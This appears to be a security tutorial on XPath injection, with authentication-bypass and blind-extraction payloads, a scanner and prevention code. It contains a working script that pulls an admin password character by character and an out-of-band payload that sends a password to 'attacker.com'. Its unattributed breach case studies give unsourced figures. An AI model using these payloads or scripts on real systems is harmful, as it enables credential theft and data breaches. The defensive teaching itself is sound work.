# XPath Injection

XPath injection is a code injection attack in which attacker-controlled input is interpolated into the XPath queries an application runs against XML data, allowing the attacker to bypass authentication or extract sensitive data.

HIGH SEVERITY | DATA BREACH | XML SECURITY

# What is XPath Injection?

Critical Data Exposure Risk

XPath Injection can expose entire XML databases, bypass authentication systems, and reveal sensitive information including passwords, financial data, and personal records.

In Simple Terms:

Imagine an XML database as a filing cabinet with folders organized in a specific structure. XPath is like the search command you use to find specific documents.

A normal search might be: "Find the folder for user 'John' with password 'secret123'"

XPath Injection is like manipulating the search to say: "Find the folder for user 'John' OR just show me ALL folders regardless of password"

The filing system follows your manipulated instructions and hands over everything - including documents you shouldn't see.

# Real-World Analogy

Think of XPath like a library's book search system:

XML stores data in a tree structure, like a library organizing books by:

Category → Genre → Author → Title
Similar to: /library/category/genre/author/book

Librarian searches:

xpath
//book[author='Smith' and title='The Secret']

Returns: One specific book by Smith

Attacker modifies search:

xpath
//book[author='Smith' or '1'='1' and title='anything']

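The '1'='1' part is always true, but and binds more tightly than or, so the search is read as: author='Smith' or ('1'='1' and title='anything')
Returns: EVERY book by Smith, whatever its title. The title check no longer applies.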

The search system can't distinguish between a legitimate complex search and a manipulated one.

# How XPath Injection Works

# Understanding XPath and XML

XML (eXtensible Markup Language) stores data in a tree structure:

<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user>
    <username>admin</username>
    <password>secretAdminPass123</password>
    <role>administrator</role>
    <email>admin@example.com</email>
  </user>
  <user>
    <username>john</username>
    <password>john'sPassword456</password>
    <role>user</role>
    <email>john@example.com</email>
  </user>
</users>

XPath is a query language for selecting nodes from XML:

xpath
//user[username='admin' and password='secretAdminPass123']
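To make node selection concrete, here is a minimal sketch that runs an equivalent query with Python's standard-library `xml.etree.ElementTree`. It assumes a trimmed copy of the sample document (john's password is a simplified placeholder). ElementTree implements only a small XPath subset without the `and` operator, so the two conditions are written as chained predicates.

```python
import xml.etree.ElementTree as ET

# Trimmed copy of the sample document; values are placeholders for illustration.
USERS_XML = """
<users>
  <user>
    <username>admin</username>
    <password>secretAdminPass123</password>
    <role>administrator</role>
  </user>
  <user>
    <username>john</username>
    <password>johnPass456</password>
    <role>user</role>
  </user>
</users>
"""

root = ET.fromstring(USERS_XML)

# ElementTree has no `and` operator, so both conditions are chained predicates.
matches = root.findall(".//user[username='admin'][password='secretAdminPass123']")
roles = [user.findtext("role") for user in matches]

# A wrong password selects nothing.
no_match = root.findall(".//user[username='admin'][password='wrong']")

print(roles)          # ['administrator']
print(len(no_match))  # 0
```

A full XPath 1.0 engine such as lxml accepts the `and` form shown above directly.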

# The Attack Process

Application builds XPath query:

xpath
//user[username='admin' and password='correctPass']

Returns: Admin user if password matches

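Attacker enters the username: admin' or '1'='1

Application builds the query:

xpath
//user[username='admin' or '1'='1' and password='anything']

and binds more tightly than or, so the predicate is read as username='admin' or ('1'='1' and password='anything')
The first branch, username='admin', is true for the admin node whatever the password is
The password check is bypassed for that account

XPath returns the admin user without validating the password, granting full access.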
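Operator precedence decides which payloads actually bypass the check. The sketch below assumes lxml and a two-user in-memory document with placeholder passwords; `vulnerable_lookup` is a hypothetical helper that builds the query the same way the vulnerable application does.

```python
from lxml import etree

# Two-user sample document (placeholder passwords).
USERS = etree.fromstring(
    "<users>"
    "<user><username>admin</username><password>secretAdminPass123</password></user>"
    "<user><username>john</username><password>johnPass456</password></user>"
    "</users>"
)

def vulnerable_lookup(username, password):
    """Build the query by string interpolation, as the vulnerable application does."""
    query = f"//user[username='{username}' and password='{password}']"
    return [user.findtext("username") for user in USERS.xpath(query)]

# Parsed as: username='admin' or ('1'='1' and password='anything')
admin_only = vulnerable_lookup("admin' or '1'='1", "anything")

# Parsed as: username='' or ('1'='1' and password='anything'), which matches nobody
no_bypass = vulnerable_lookup("' or '1'='1", "anything")

# The trailing or ''=' absorbs the password test, so the predicate is true for every user
everyone = vulnerable_lookup("' or 1=1 or ''='", "anything")

print(admin_only)  # ['admin']
print(no_bypass)   # []
print(everyone)    # ['admin', 'john']
```

The second case shows that a bare `' or '1'='1` in the username field is not enough on its own: the always-true comparison is still and-ed with the password test.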

# Types of XPath Injection Attacks

# 1. Authentication Bypass

CRITICAL

from lxml import etree

def authenticate_user(username, password):
    # Load XML database
    tree = etree.parse('users.xml')

    # VULNERABLE: Direct string concatenation
    xpath_query = f"//user[username='{username}' and password='{password}']"

    # Execute query
    result = tree.xpath(xpath_query)

    if result:
        return True  # User authenticated
    return False

# Attack payload
username = "admin' or '1'='1"
password = "anything"

# Resulting query: //user[username='admin' or '1'='1' and password='anything']
# Returns admin user without password verification!

Username Injections:
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='

Password Injections:
' or '1'='1
anything' or 'x'='x

Combined:
Username: admin
Password: ' or '1'='1

xpath
Original query:
//user[username='admin' and password='correctPass']

Injected query:
//user[username='admin' or '1'='1' and password='anything']

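Result: Returns the admin user. Because and binds more tightly than or, username='admin' alone satisfies the predicate, so the password is never checked for that account.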

# 2. Blind XPath Injection

HIGH RISK

When the application does not display query results directly, attackers extract data one character at a time by injecting boolean conditions and observing whether the response changes.

# Testing if admin user exists
payload = "' or count(//user[username='admin'])=1 or ''='"

# Extracting admin password length (18 characters in the sample document above)
payload = "' or string-length(//user[username='admin']/password)=18 or ''='"

# Extracting first character of password
payload = "' or substring(//user[username='admin']/password,1,1)='a' or ''='"
payload = "' or substring(//user[username='admin']/password,1,1)='b' or ''='"
# ... continue for each character

# Extracting second character
payload = "' or substring(//user[username='admin']/password,2,1)='e' or ''='"
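A rough, worked estimate shows how many requests this character-by-character approach needs. It assumes the 18-character sample password and a printable-ASCII candidate set; both are illustrative choices, not measurements.

```python
import string

# Candidate characters an attacker might try at each position (printable ASCII).
charset = string.ascii_letters + string.digits + string.punctuation

password_length = 18  # length of "secretAdminPass123" in the sample document
max_length_probes = 50  # assumed upper bound while guessing the length

# Linear search: at most one request per candidate character at each position.
worst_case_char_requests = password_length * len(charset)
worst_case_total = max_length_probes + worst_case_char_requests

print(len(charset))              # 94
print(worst_case_char_requests)  # 1692
print(worst_case_total)          # 1742
```

A burst of well over a thousand near-identical login requests from one client is the kind of pattern that rate limiting and monitoring are meant to catch.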

import requests
import string

def extract_admin_password(url, max_length=50):
    """Extract admin password character by character"""
    password = ""
    # Exclude the single quote: it would terminate the injected string literal
    charset = (string.ascii_letters + string.digits + string.punctuation).replace("'", "")

    def is_true(payload):
        # Assumes the page contains "success" only when the injected condition holds.
        # A 200 status alone proves nothing: failed logins usually return 200 as well.
        response = requests.post(url, data={'username': payload, 'password': 'test'}, timeout=10)
        return "success" in response.text

    # First, find password length
    length = None
    for candidate in range(1, max_length + 1):
        if is_true(f"' or string-length(//user[username='admin']/password)={candidate} or ''='"):
            length = candidate
            print(f"[+] Password length: {length}")
            break

    if length is None:
        print("[-] Could not determine password length")
        return None

    # Extract each character
    for position in range(1, length + 1):
        for char in charset:
            if is_true(f"' or substring(//user[username='admin']/password,{position},1)='{char}' or ''='"):
                password += char
                print(f"[+] Found character {position}: {char} (password so far: {password})")
                break
        else:
            # No candidate matched (for example a quote or a non-ASCII character)
            password += "?"

    return password

# Usage
admin_password = extract_admin_password('https://vulnerable-site.com/login')
print(f"[!] Admin password: {admin_password}")

# 3. Complete XML Document Extraction

MEDIUM RISK

# Vulnerable search function
def search_products(product_name):
    tree = etree.parse('products.xml')

    # VULNERABLE: No input sanitization
    xpath_query = f"//product[name='{product_name}']"

    results = tree.xpath(xpath_query)
    return results

# Normal search
search_products("Laptop")
# Query: //product[name='Laptop']
# Returns: Laptop products

# Malicious search - Extract all products
search_products("' or '1'='1")
# Query: //product[name='' or '1'='1']
# Returns: ALL products in database!

# Extract specific sensitive data
search_products("'] | //user[username='admin")
# Query: //product[name=''] | //user[username='admin']
# Returns: Admin user data from users section!

Attack payloads using XPath functions:

Count nodes:
' or count(//user)>0 or ''='

Extract node names:
' or name(//user[1])='user' or ''='

Extract all text:
' or //text() or ''='

Access parent nodes:
' or //user/parent::* or ''='

Navigate XML structure:
' or //*/password or ''='

# 4. Out-of-Band Data Exfiltration

ADVANCED TECHNIQUE

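# Requires an XPath 2.0+ processor that allows doc() to fetch remote URIs.
# XPath 1.0 engines, including lxml/libxml2, have no doc() function.
# Where it is available, an attacker can exfiltrate data via HTTP requests.

# The || concatenation operator is XPath 3.0; on XPath 2.0 use concat() instead
payload = """' or doc('http://attacker.com/steal?data=' || //user[username='admin']/password) or ''='"""

# If the processor resolves the URI, the admin password is sent to the attacker's server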

# Real-World Examples

# Case Study 1: Financial Institution Data Breach (2016)

A major bank's internal employee portal used an XML database with XPath for authentication.

@app.route('/employee/login', methods=['POST'])
def employee_login():
    username = request.form['username']
    password = request.form['password']

    # VULNERABLE: Direct string concatenation
    xpath_query = f"//employee[username='{username}' and password='{password}']"

    tree = etree.parse('/data/employees.xml')
    result = tree.xpath(xpath_query)

    if result:
        session['user'] = result[0].find('username').text
        session['role'] = result[0].find('role').text
        return redirect('/dashboard')

    return "Login failed"

An external attacker discovered the vulnerability through error messages:

Username: admin' or '1'='1
Password: [empty]

Then used blind XPath injection to extract:

All employee credentials
Salary information
Social security numbers
Bank account details
Customer account numbers

15,000+ employee records compromised
2.5 million customer accounts at risk
$45 million in direct costs (remediation, notification, credit monitoring)
$120 million regulatory fines
$85 million class action settlement
Stock price dropped 22%
CEO and CIO resigned

# Case Study 2: Healthcare Portal XPath Injection (2018)

250,000 Patients Affected

HIPAA Violation

XPath injection in a patient portal exposed electronic health records stored in XML format.

Technical Details:

<!-- Their XML structure -->
<patients>
  <patient>
    <id>P12345</id>
    <name>John Doe</name>
    <dateOfBirth>1980-01-01</dateOfBirth>
    <ssn>123-45-6789</ssn>
    <diagnosis>Diabetes Type 2</diagnosis>
    <medications>
      <medication>Metformin 500mg</medication>
      <medication>Insulin Glargine</medication>
    </medications>
    <insurance>
      <provider>BlueCross</provider>
      <policy>BC-12345678</policy>
    </insurance>
  </patient>
</patients>

# Their vulnerable patient lookup
def get_patient_records(patient_id, dob):
    # VULNERABLE: No input validation
    xpath = f"//patient[id='{patient_id}' and dateOfBirth='{dob}']"

    tree = etree.parse('/secure/patients.xml')
    results = tree.xpath(xpath)

    return render_template('patient_record.html', patient=results)

Attack Payload:

Patient ID: ' or 1=1 or ''='
Date of Birth: [any]

What Was Exposed:

250,000 patient health records
Diagnoses and treatment histories
Prescriptions and medications
Social security numbers
Insurance information
Lab results and medical images

Consequences:

$16 million HIPAA violation fine
$42 million class action lawsuit
Criminal investigation by DOJ
Hospital system lost major contracts
3-year compliance monitoring imposed

# Case Study 3: E-commerce Product Database Breach (2019)

An online retailer stored its product catalog and customer reviews in XML.

// Node.js vulnerable product search
const xpath = require('xpath');
const dom = require('xmldom').DOMParser;
const fs = require('fs');

app.get('/products/search', (req, res) => {
  const searchTerm = req.query.q;

  // VULNERABLE: Direct string interpolation
  const xpathQuery = `//product[contains(name, '${searchTerm}') or contains(description, '${searchTerm}')]`;

  const xml = fs.readFileSync('products.xml', 'utf8');
  const doc = new dom().parseFromString(xml);

  const results = xpath.select(xpathQuery, doc);

  res.json(results);
});

Attacker used search functionality to inject:

Search: ') or '1'='1'] | //customer[contains(email, '@

This extracted:

Internal product costs and margins
Supplier pricing
Customer email addresses
Order histories
Payment information

800,000 customer emails harvested
Used for phishing campaign
Competitive pricing information leaked
$3.5 million in losses
$8 million GDPR fines

# How to Detect XPath Injection

# Manual Testing

Find inputs that might query XML:

Login forms
Search boxes
Filter parameters
ID lookups
API endpoints

Try XPath special characters:

' " / [ ] ( ) @ * |

Watch for:

XML parsing errors
XPath syntax errors
Changes in response
Different behavior

' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='
'] | //user[@* or '1'='1

' or count(//user)>0 or ''='
' or string-length(//user[1]/password)>0 or ''='
' or substring(//user[1]/password,1,1)='a' or ''='

# Automated Testing Script

import requests

def test_xpath_injection(target_url, param_name):
    """Test for XPath injection vulnerabilities"""

    test_payloads = [
        # Authentication bypass
        "' or '1'='1",
        "' or 1=1 or ''='",
        "admin' or '1'='1' or ''='",
        "' or ''='",
        "x' or 1=1 or 'x'='y",

        # Boolean tests
        "' or count(//user)>0 or ''='",
        "' or string-length(//user[1]/password)>0 or ''='",

        # Node extraction
        "'] | //user | //x[@'='",
        "'] | //* | //x[@'='",

        # Function tests
        "' or name()='user' or ''='",
        "' or local-name()='password' or ''='",

        # Parent node access
        "'] | //user/parent::* | //x[@'='"
    ]

    vulnerabilities = []
    baseline_response = None

    try:
        # Get baseline response
        baseline_response = requests.get(target_url, params={param_name: 'normaltest'}, timeout=5)
    except Exception as e:
        print(f"[-] Error getting baseline: {e}")
        return []

    print(f"[*] Testing {target_url} parameter '{param_name}'...")

    for payload in test_payloads:
        try:
            response = requests.get(
                target_url,
                params={param_name: payload},
                timeout=5
            )

            # Check for vulnerability indicators
            if response.status_code != baseline_response.status_code:
                vulnerabilities.append({
                    'payload': payload,
                    'type': 'Status Code Change',
                    'severity': 'MEDIUM',
                    'status': response.status_code
                })
                print(f"[!] Status change with: {payload}")

            # Check for XPath errors
            xpath_errors = [
                'xpath',
                'XPathException',
                'xmlXPathEval',
                'XPath error',
                'XPath syntax error',
                'Invalid predicate',
                'Invalid expression'
            ]

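            for error in xpath_errors:
                # Ignore markers that already appear in the baseline page
                if error.lower() in response.text.lower() and error.lower() not in baseline_response.text.lower():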
                    vulnerabilities.append({
                        'payload': payload,
                        'type': 'XPath Error Message',
                        'severity': 'HIGH',
                        'error': error
                    })
                    print(f"[!] XPath error revealed with: {payload}")
                    break

            # Check for successful bypass (content changes)
            if len(response.text) > len(baseline_response.text) * 1.5:
                vulnerabilities.append({
                    'payload': payload,
                    'type': 'Possible Authentication Bypass',
                    'severity': 'CRITICAL',
                    'note': 'Significantly more content returned'
                })
                print(f"[!] CRITICAL: Possible bypass with: {payload}")

        except requests.exceptions.Timeout:
            print(f"[-] Timeout with payload: {payload}")
        except Exception as e:
            print(f"[-] Error testing '{payload}': {e}")

    return vulnerabilities

# Test your application
vulns = test_xpath_injection(
    'https://example.com/search',
    'q'  # Query parameter name
)

if vulns:
    print(f"\n[!] Found {len(vulns)} potential XPath injection vulnerabilities!")
    for vuln in vulns:
        print(f"  [{vuln['severity']}] {vuln['type']}: {vuln['payload']}")
else:
    print("[+] No XPath injection vulnerabilities detected")

# Burp Intruder payload list for XPath injection
payloads = """
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='
x' or 1=1 or 'x'='y
'] | //user[@* or '1'='1'] | //x[@'='
'] | //* | //x[@'='
' or count(//user)>0 or ''='
' or string-length(//user[1]/password)>0 or ''='
' or substring(//user[1]/password,1,1)='a' or ''='
' or name()='user' or ''='
"""

# Configure Burp:
# 1. Set payload positions at vulnerable parameters
# 2. Load payloads from above list
# 3. Grep Match:
#    - xpath
#    - XPathException
#    - xmlXPathEval
#    - Invalid predicate
# 4. Check for status code changes
# 5. Compare response lengths
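Comparing raw lengths can miss pages that differ in content but not in size. As a complement, here is a minimal sketch that scores body similarity with the standard library's `difflib`. The `responses_differ` helper, the 0.9 threshold, and the sample bodies are assumptions chosen for illustration.

```python
from difflib import SequenceMatcher

def responses_differ(baseline: str, candidate: str, min_similarity: float = 0.9) -> bool:
    """Return True when the candidate body is noticeably unlike the baseline body."""
    similarity = SequenceMatcher(None, baseline, candidate).ratio()
    return similarity < min_similarity

# Hypothetical response bodies: a normal "no results" page and a page that leaked many rows.
baseline_body = "<html><body><p>No products found.</p></body></html>"
same_body = "<html><body><p>No products found.</p></body></html>"
bypass_body = "<html><body><ul>" + "<li>product</li>" * 50 + "</ul></body></html>"

print(responses_differ(baseline_body, same_body))    # False
print(responses_differ(baseline_body, bypass_body))  # True
```

Pages with timestamps or per-request tokens will need a lower threshold or some normalisation before comparison.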

# Prevention Strategies

# 1. Parameterized XPath Queries

MOST SECURE

from lxml import etree

def safe_authenticate(username, password):
    """Secure XPath authentication using parameterized queries"""

    tree = etree.parse('users.xml')

    # Method 1: Use XPath variables (lxml supports this)
    # SECURE: Parameters are passed separately
    xpath_query = "//user[username=$username and password=$password]"

    result = tree.xpath(
        xpath_query,
        username=username,
        password=password
    )

    if result:
        return {
            'authenticated': True,
            'username': result[0].find('username').text,
            'role': result[0].find('role').text
        }

    return {'authenticated': False}

# Attack payloads will NOT work
username = "admin' or '1'='1"
password = "anything"

# XPath treats these as literal strings, not code:
# username = "admin' or '1'='1" (the WHOLE string including quotes)
# password = "anything"
# No injection possible!

const xpath = require('xpath');
const dom = require('xmldom').DOMParser;
const fs = require('fs');

function safeAuthenticate(username, password) {
  const xml = fs.readFileSync('users.xml', 'utf8');
  const doc = new dom().parseFromString(xml);

  // Method: Manually iterate and compare (most secure)
  // SECURE: No XPath injection possible

  const users = xpath.select('//user', doc);

  for (let user of users) {
    const userUsername = xpath.select('string(username)', user);
    const userPassword = xpath.select('string(password)', user);

    // Direct string comparison (no injection)
    if (userUsername === username && userPassword === password) {
      return {
        authenticated: true,
        username: userUsername,
        role: xpath.select('string(role)', user)
      };
    }
  }

  return { authenticated: false };
}

// Attack payloads will not work
const result = safeAuthenticate("admin' or '1'='1", "anything");
// This looks for EXACT match of username "admin' or '1'='1"
// No code execution - just string comparison

import javax.xml.namespace.QName;
import javax.xml.parsers.*;
import javax.xml.xpath.*;
import org.w3c.dom.*;
import java.io.File;
import java.util.HashMap;
import java.util.Map;

public class SecureXPathAuth {

    public static boolean authenticateUser(String username, String password) {
        try {
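            // Parse XML (DOCTYPE declarations are disallowed to prevent XXE)
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            DocumentBuilder builder = factory.newDocumentBuilder();
            Document doc = builder.parse(new File("users.xml"));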

            // SECURE: Use XPath with variables
            XPathFactory xPathFactory = XPathFactory.newInstance();
            XPath xPath = xPathFactory.newXPath();

            // Set variables (parameterized)
            SimpleVariableResolver resolver = new SimpleVariableResolver();
            resolver.addVariable("username", username);
            resolver.addVariable("password", password);
            xPath.setXPathVariableResolver(resolver);

            // Parameterized query
            String xpathExpression = "//user[username=$username and password=$password]";

            XPathExpression expr = xPath.compile(xpathExpression);
            NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);

            return nodes.getLength() > 0;

        } catch (Exception e) {
            System.err.println("Authentication error: " + e.getMessage());
            return false;
        }
    }

    // Variable resolver for XPath parameters
    static class SimpleVariableResolver implements XPathVariableResolver {
        private Map<String, Object> variables = new HashMap<>();

        public void addVariable(String name, Object value) {
            variables.put(name, value);
        }

        @Override
        public Object resolveVariable(QName variableName) {
            return variables.get(variableName.getLocalPart());
        }
    }
}

# 2. Input Validation and Sanitization

DEFENSE IN DEPTH

import re
from lxml import etree

def sanitize_xpath_input(user_input):
    """Sanitize input for XPath queries"""

    # Method 1: Strict allowlist validation
    if not re.match(r'^[a-zA-Z0-9@._-]{3,50}$', user_input):
        raise ValueError("Invalid input format")

    return user_input

def escape_xpath_value(value):
    """Escape special XPath characters"""

    # XPath doesn't have standard escaping, so we need to be creative

    # If value contains both ' and ", we're in trouble with XPath 1.0
    # Best approach: Use concat function

    if "'" not in value:
        # Simple case: wrap in single quotes
        return f"'{value}'"
    elif '"' not in value:
        # No double quotes: wrap in double quotes
        return f'"{value}"'
    else:
        # Contains both: single-quote each piece and rejoin with a double-quoted apostrophe
        parts = value.split("'")
        quoted_parts = [f"'{part}'" for part in parts]
        return "concat(" + ", \"'\", ".join(quoted_parts) + ")"

def safe_search_products(product_name):
    """Secure product search with escaping"""

    # Validate input
    if not product_name or len(product_name) > 100:
        return []

    tree = etree.parse('products.xml')

    # Escape the value
    escaped_name = escape_xpath_value(product_name)

    # Build query with escaped value
    xpath_query = f"//product[name={escaped_name}]"

    results = tree.xpath(xpath_query)
    return results

# Example usage
# Input: O'Reilly Books
# Escaped: "O'Reilly Books"
# Query: //product[name="O'Reilly Books"]
#
# Input: 5" O'Ring
# Escaped: concat('5" O', "'", 'Ring')
# Query: //product[name=concat('5" O', "'", 'Ring')]
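One way to gain confidence in a quoting helper is a round-trip check: evaluating the generated literal should give back the original input unchanged. The sketch below assumes lxml. `xpath_literal` is a compact, hypothetical stand-in for the quoting logic, not a library function.

```python
from lxml import etree

def xpath_literal(value: str) -> str:
    """Return an XPath 1.0 expression that evaluates to exactly `value`."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    # Both quote types present: single-quote each piece, rejoin with a quoted apostrophe.
    pieces = [f"'{piece}'" for piece in value.split("'")]
    return "concat(" + ", \"'\", ".join(pieces) + ")"

root = etree.fromstring("<root/>")
samples = ["Laptop", "O'Reilly Books", 'say "hi"', """5" O'Ring""", "' or '1'='1"]

# string(<literal>) should evaluate to the original input for every sample.
round_trips = [root.xpath(f"string({xpath_literal(s)})") == s for s in samples]

print(xpath_literal("""5" O'Ring"""))  # concat('5" O', "'", 'Ring')
print(all(round_trips))                # True
```

If any sample fails the round trip, the helper is letting part of the input escape the string literal, which is exactly the condition injection relies on.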

import re
from typing import Any, Optional

class XPathInputValidator:
    """Comprehensive XPath input validation"""

    # Validation patterns
    USERNAME_PATTERN = r'^[a-zA-Z0-9._-]{3,20}$'
    EMAIL_PATTERN = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    ALPHANUMERIC_PATTERN = r'^[a-zA-Z0-9\s]{1,100}$'

    # Dangerous XPath keywords
    XPATH_KEYWORDS = [
        'or', 'and', 'not', 'div', 'mod', 'union', '|',
        'parent::', 'ancestor::', 'following::', 'preceding::',
        'document', 'doc', 'collection'
    ]

    @staticmethod
    def validate_username(username: str) -> bool:
        """Validate username format"""
        return bool(re.match(XPathInputValidator.USERNAME_PATTERN, username))

    @staticmethod
    def validate_email(email: str) -> bool:
        """Validate email format"""
        return bool(re.match(XPathInputValidator.EMAIL_PATTERN, email))

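    @staticmethod
    def check_dangerous_keywords(value: str) -> bool:
        """Return False if the value contains an XPath keyword or operator"""
        value_lower = value.lower()

        for keyword in XPathInputValidator.XPATH_KEYWORDS:
            if keyword.isalpha():
                # Match whole words only, so "Gordon" is not rejected for containing "or"
                if re.search(rf'\b{keyword}\b', value_lower):
                    return False
            elif keyword in value_lower:
                return False

        return True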

    @staticmethod
    def sanitize_and_validate(value: str, input_type: str = 'alphanumeric') -> Optional[str]:
        """Sanitize and validate input"""

        # Check length
        if not value or len(value) > 100:
            raise ValueError("Input length invalid")

        # Reject dangerous characters ('@' is allowed only when validating an email)
        dangerous_chars = ["'", '"', '/', '[', ']', '(', ')', '@', '*', '|', '\\']

        for char in dangerous_chars:
            if char in value and not (char == '@' and input_type == 'email'):
                raise ValueError(f"Dangerous character detected: {char}")

        # Check for XPath keywords
        if not XPathInputValidator.check_dangerous_keywords(value):
            raise ValueError("Dangerous XPath keyword detected")

        # Type-specific validation
        if input_type == 'username':
            if not XPathInputValidator.validate_username(value):
                raise ValueError("Invalid username format")
        elif input_type == 'email':
            if not XPathInputValidator.validate_email(value):
                raise ValueError("Invalid email format")
        elif input_type == 'alphanumeric':
            if not re.match(XPathInputValidator.ALPHANUMERIC_PATTERN, value):
                raise ValueError("Invalid alphanumeric input")

        return value

# Usage
try:
    username = XPathInputValidator.sanitize_and_validate("admin' or '1'='1", 'username')
    # Raises: ValueError: Dangerous character detected: '
except ValueError as e:
    print(f"Invalid input: {e}")

# 3. Migrate from XML to Secure Database

LONG-TERM SOLUTION

# Instead of XML/XPath, use proper database with parameterized queries

import sqlite3
from werkzeug.security import check_password_hash

def authenticate_with_database(username, password):
    """Secure authentication using SQLite with parameterized queries"""

    conn = sqlite3.connect('users.db')
    cursor = conn.cursor()

    # SECURE: Parameterized query (no injection possible)
    cursor.execute(
        "SELECT username, password_hash, role FROM users WHERE username = ?",
        (username,)
    )

    result = cursor.fetchone()
    conn.close()

    if result and check_password_hash(result[1], password):
        return {
            'authenticated': True,
            'username': result[0],
            'role': result[2]
        }

    return {'authenticated': False}

# Injection payloads have NO effect
username = "admin' or '1'='1"
# Treated as literal string "admin' or '1'='1"
# No code execution possible!
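The binding behaviour can be checked without any external files. This is a minimal sketch using an in-memory SQLite database; the table layout and the `find_role` helper are assumptions made for illustration, and password verification is left out to keep the focus on parameter binding.

```python
import sqlite3

# In-memory database with a hypothetical two-column users table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, role TEXT)")
conn.executemany(
    "INSERT INTO users (username, role) VALUES (?, ?)",
    [("admin", "administrator"), ("john", "user")],
)

def find_role(username):
    """Look up a role with a bound parameter; the value is never parsed as SQL."""
    row = conn.execute(
        "SELECT role FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None

legit = find_role("admin")
injected = find_role("admin' or '1'='1")

print(legit)     # administrator
print(injected)  # None
```

The payload is compared as one literal username, so it matches no row.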

# 4. Comprehensive Security Implementation

[xpath_security.py]
from lxml import etree
from typing import Optional, Dict, Any
import logging
import hashlib

class SecureXPathService:
    """Enterprise-grade secure XPath service"""

    def __init__(self, xml_file: str):
        self.xml_file = xml_file
        self.tree = None
        self.logger = logging.getLogger(__name__)
        self.load_xml()

    def load_xml(self):
        """Load and validate XML file"""
        try:
            # Parse with security settings
            parser = etree.XMLParser(
                remove_blank_text=True,
                resolve_entities=False,  # Prevent XXE
                no_network=True,         # No external resources
                dtd_validation=False,    # No DTD validation
                load_dtd=False           # Don't load DTD
            )

            self.tree = etree.parse(self.xml_file, parser)

        except Exception as e:
            self.logger.error(f"Failed to load XML: {e}")
            raise

    def authenticate(self, username: str, password: str) -> Dict[str, Any]:
        """Secure authentication - iterate manually"""

        # Input validation
        if not self._validate_username(username):
            # Log with %r so control characters in attacker input cannot forge log lines
            self.logger.warning("Invalid username format: %r", username)
            return {'authenticated': False}

        # Iterate through users manually (no XPath injection possible)
        users = self.tree.xpath('//user')

        for user in users:
            stored_username = user.find('username').text
            stored_password_hash = user.find('password_hash').text

            if stored_username == username:
                # Check password hash
                password_hash = self._hash_password(password)

                if password_hash == stored_password_hash:
                    self.logger.info(f"Successful authentication: {username}")
                    return {
                        'authenticated': True,
                        'username': stored_username,
                        'role': user.find('role').text
                    }

        self.logger.warning(f"Failed authentication: {username}")
        return {'authenticated': False}

    def _validate_username(self, username: str) -> bool:
        """Strict username validation"""
        import re
        return bool(re.match(r'^[a-zA-Z0-9._-]{3,20}$', username))

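    def _hash_password(self, password: str) -> str:
        """Hash password (unsalted SHA-256, kept only to match the sample users.xml)"""
        # NOTE: a fast, unsalted digest is weak for password storage; prefer a salted
        # key-derivation function such as hashlib.pbkdf2_hmac or hashlib.scrypt.
        return hashlib.sha256(password.encode()).hexdigest()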

    def search_safe(self, field: str, value: str) -> list:
        """Safe search without user-controlled XPath"""

        # Whitelist allowed fields
        allowed_fields = ['username', 'email', 'role']

        if field not in allowed_fields:
            raise ValueError(f"Invalid field: {field}")

        # Validate input
        if not value or len(value) > 100:
            raise ValueError("Invalid search value")

        # Manual iteration (no XPath with user input)
        results = []
        users = self.tree.xpath('//user')

        for user in users:
            field_value = user.find(field)

            if field_value is not None and field_value.text and value.lower() in field_value.text.lower():
                results.append({
                    'username': user.find('username').text,
                    'email': user.find('email').text,
                    'role': user.find('role').text
                })

        return results

[users.xml]
<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user>
    <username>admin</username>
    <!-- Store password hashes, not plaintext -->
    <password_hash>5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8</password_hash>
    <role>administrator</role>
    <email>admin@example.com</email>
  </user>
  <user>
    <username>john</username>
    <password_hash>6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b</password_hash>
    <role>user</role>
    <email>john@example.com</email>
  </user>
</users>
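The sample hashes above are plain, unsalted SHA-256 digests (the first is the widely published digest of the word "password"), so they can be reversed by simple lookup. Below is a minimal sketch of salted password hashing using only the standard library. The `salt$hash` storage format, the iteration count, and the function names are assumptions for illustration, not part of the service above.

```python
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 100_000  # illustrative work factor; tune for your hardware

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'salt_hex$hash_hex' using PBKDF2-HMAC-SHA256 with a per-user random salt."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"{salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), ITERATIONS
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)

stored = hash_password("correct horse battery staple")

print(verify_password("correct horse battery staple", stored))  # True
print(verify_password("' or '1'='1", stored))                   # False
```

The resulting string could be stored in a `password_hash` element in place of the bare digest. Because each user gets a random salt, identical passwords no longer produce identical stored values.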

# Security Checklist

# Development

Never concatenate user input into XPath queries
Use parameterized XPath queries when available
Validate all inputs with strict allowlists
Reject XPath special characters, or quote values safely with concat(), since XPath 1.0 has no escape syntax: ' " / [ ] ( ) @ * |
Check for dangerous XPath keywords (or, and, union, |)
Store password hashes, never plaintext
Consider migrating from XML to proper database
Implement comprehensive input validation

# Testing

Test with XPath injection payloads
Verify authentication bypass attempts fail
Test boolean-based blind injection
Check for XPath error messages in responses
Test with special characters
Verify node extraction attempts fail
Test with XPath functions (count, substring, etc.)
Use automated scanners (Burp Suite, OWASP ZAP)

# Production

Disable XML entity expansion (prevent XXE)
Implement comprehensive logging
